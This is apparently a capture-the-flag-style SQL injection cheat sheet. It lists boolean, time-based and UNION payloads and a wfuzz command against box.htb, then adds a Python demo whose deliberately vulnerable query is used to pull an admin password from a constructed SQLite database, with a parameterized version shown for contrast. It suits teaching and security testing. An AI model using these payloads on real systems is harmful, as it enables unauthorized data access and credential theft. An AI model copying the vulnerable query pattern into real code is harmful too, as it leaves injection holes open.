SQL Injection

Manual

Boolean-based (the comment sequence depends on the DBMS: -- - and # for MySQL, -- for MSSQL/others)

' or 1=1
' or 1=1-- - 
' or 1=1#
' or 1=1/
' or 1=1-- - //

Column-count enumeration (increase the number until the query errors)

' order by 1 -- -
' order by 1-- #

Time-based, MySQL (sleep())

' or sleep(5)-- -
" or sleep(5)="
' or sleep(5)='
' AND IF (1=1, sleep(3),'false') -- //

Time-based, MSSQL (waitfor delay)

'waitfor delay '0:0:5'--
;waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--

Union-based

union select <number of columns>

AND can be used in place of OR as well; an AND condition confirms the injection without returning every row, which is quieter and less likely to break the page.

%

If an application accepts a % as a wildcard, the query is most likely wrapping the input in % signs (LIKE '%joe%') to find rows "like" the input. A lone % returning every row is a strong sign of this pattern.

Test on PHP applications, for example:

Fuzz with special characters

wfuzz -u http://box.htb/room.php?cod=1FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404

After finding an injection point, work out how the query is structured.

With UNION SELECT the injected SELECT must return the same number of columns as the original query (the right side must match the left side); enumerate the count with ORDER BY n until the database errors.

If the original WHERE clause matches nothing (evaluates to false) the UNION result replaces the output, so a payload can be placed in one of the columns:

union select 1,2,(<Payload>),3,4,5,6,7
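The following is an added worked example, not code from the original page. It uses a hypothetical handler modelled on the room.php?cod= parameter above, backed by an in-memory SQLite database with constructed sample data (table and column names, the users table and its password are all assumptions). It shows the three techniques in sequence: the %-wildcard LIKE pattern, the ORDER BY column-count walk, and a UNION SELECT whose payload column replaces the output once the original WHERE clause matches nothing. Time-based payloads (sleep(), waitfor delay) are not shown because SQLite has no equivalent function.

```python
import sqlite3

# Constructed sample data (assumption, not from the original page).
ROOMS = [
    (1, "Blue Room", "ground floor"),
    (2, "Red Room", "first floor"),
    (3, "Green Room", "basement"),
]


def make_db():
    """Build an in-memory database with a 3-column rooms table and a users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE rooms (id INTEGER, name TEXT, location TEXT)")
    con.executemany("INSERT INTO rooms VALUES (?, ?, ?)", ROOMS)
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")  # constructed secret
    return con


def vulnerable_lookup(con, cod):
    """Hypothetical room.php?cod= handler: the parameter is concatenated straight
    into the SQL string, which is the injection point. Errors are returned as text
    so the caller can see when a payload breaks the query (ORDER BY too high,
    UNION column mismatch)."""
    query = f"SELECT id, name, location FROM rooms WHERE id = '{cod}'"
    try:
        return con.execute(query).fetchall()
    except sqlite3.OperationalError as e:
        return f"SQL error: {e}"


def vulnerable_search(con, term):
    """Search that wraps the input in %...% (the LIKE '%joe%' pattern from the page),
    so a bare % from the user acts as a wildcard and matches every row."""
    query = f"SELECT name FROM rooms WHERE name LIKE '%{term}%'"
    return [row[0] for row in con.execute(query).fetchall()]


def safe_lookup(con, cod):
    """Same lookup with a bound parameter: the payload is compared as data, not parsed."""
    return con.execute(
        "SELECT id, name, location FROM rooms WHERE id = ?", (cod,)
    ).fetchall()


def count_columns(con, max_cols=10):
    """Walk ORDER BY 1..n through the injection point; the first n that errors
    tells us the original SELECT has n-1 columns."""
    for n in range(1, max_cols + 1):
        result = vulnerable_lookup(con, f"1' order by {n}-- -")
        if isinstance(result, str):
            return n - 1
    return None


def union_extract(con, payload):
    """cod=0 matches nothing, so only the UNION row comes back. The payload is
    placed in the second column; the other two are filler to match the count."""
    return vulnerable_lookup(con, f"0' union select 1,({payload}),3-- -")


if __name__ == "__main__":
    con = make_db()
    print("wildcard search:", vulnerable_search(con, "%"))
    print("boolean bypass:", vulnerable_lookup(con, "' or 1=1-- -"))
    print("column count:", count_columns(con))
    print("union mismatch:", vulnerable_lookup(con, "0' union select 1,2-- -"))
    print("union extract:", union_extract(con, "select password from users where username='admin'"))
    print("parameterized:", safe_lookup(con, "' or 1=1-- -"))
```

The same walk applies to any DBMS; only the comment sequence and the error text differ, which is why count_columns treats any error as the stop condition rather than matching a specific message.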
